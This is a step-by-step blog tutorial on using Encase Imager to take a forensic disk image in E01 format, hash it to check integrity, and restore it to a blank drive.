This article is also very helpful if we need to back up the data safely.

To image the desktop we will use Encase Imager. First download the Encase Imager from here

Open Encase Imager and Select Add local device option.

From the menu select all the options and uncheck “only show write blocked” as shown in the image and click next.

We can see all the physical drives, logical partitions, Cd Rom, RAM and process running on the system. We need to select what we need to image as our evidence, ideally it is a good practice to select the physical drives which contains the logical partitions as we get the complete disk image through physical drive. In certain case we may select only logical drive or RAM as required.

Select / Check the number of the evidence you want to image and click on finish.

The evidence you have selected will get listed in case more than one evidence is selected we will could have seen multiple evidence listed here.

Double Click on the evidence, we can see the contents present inside it and if we wish we can skip any part, file or folder from getting imaged at this stage.

Click on Acquire to proceed for the imaging. Now we need to enter the case related information, ie case number, output path, file format in which we want to generate the image

File format selected here is E01 as this is supported by multiple tools and is suitable for further analysis.

If we want to password protect/encrypt our image we can do this at this stage.

Note: It is ideal to store the image on any other external storage drive so that the storage space is not a constraint but for the sake of practical we are saving the image on desktop at the following path “C:\Users\…..\Desktop\Evidence Image\1.E01”.

Click ok and image acquisition will start, you can check the status of image acquisition on the same window at the lower right corner along with the time remaining (refer below image).

Once the acquisition is complete the image will get saved to the output folder (refer below image).

To prove the authenticity of the evidence we can generate the Hash value of the evidence

To generate the hash value of the image click on the evidence and select hash as shown in the image below.

Once the hashing process is complete click on the report section on the lower pane

Right Click and select Copy to copy the report and paste in a word /text document.

Save the report along with the Image (E01) files. This report contains all the relevant details along with the detailed report containing the hash values.

The Evidence acquisition is complete

Restoring the Evidence Image

We are done with imaging of the disk/evidence. Now we will restore this acquired image to the drive. To start with open Encase Imager and add the evidence to Encase imager

Browse to the image (.E01) file and add it to the case. The evidence added will get listed 

Double click on the image, select he files to be restored and select the restore option located under Device option.

When we click on restore, connect the drive where we want to restore the image and click next

All the drives will be read

All the drives will be displayed, select the drive where the image is to be restored. Use the blank drive for restring the image as the existing data will be wiped.

If required we can verify the Hash values and click on finish.

Type “Yes” in the text box and click on OK this will wipe the existing data on the drive and start with the image restoration.

Image Restoration will start, we can check the progress on the lower right corner of the window.

Once the restoration is complete, we can see the data in the drive we have selected.

To ensure the integrity of the data, we can see the report section on the bottom pane and check the hash values. The hash values should be same as of the image (we can check the original hash value in the image report.)

If required we can copy and save the report in any text / word file for any future reference.

Author: Ankit Gupta, the author and co-founder of this website, an ethical hacker, forensics investigator , penetration testing researcher and telecom expert. He has found his deepest passion to be around the world of telecom, cyber security and digital forensics. Contact Here

The post Forensic Imaging through Encase Imager appeared first on Hacking Articles.

Categories: Cyber India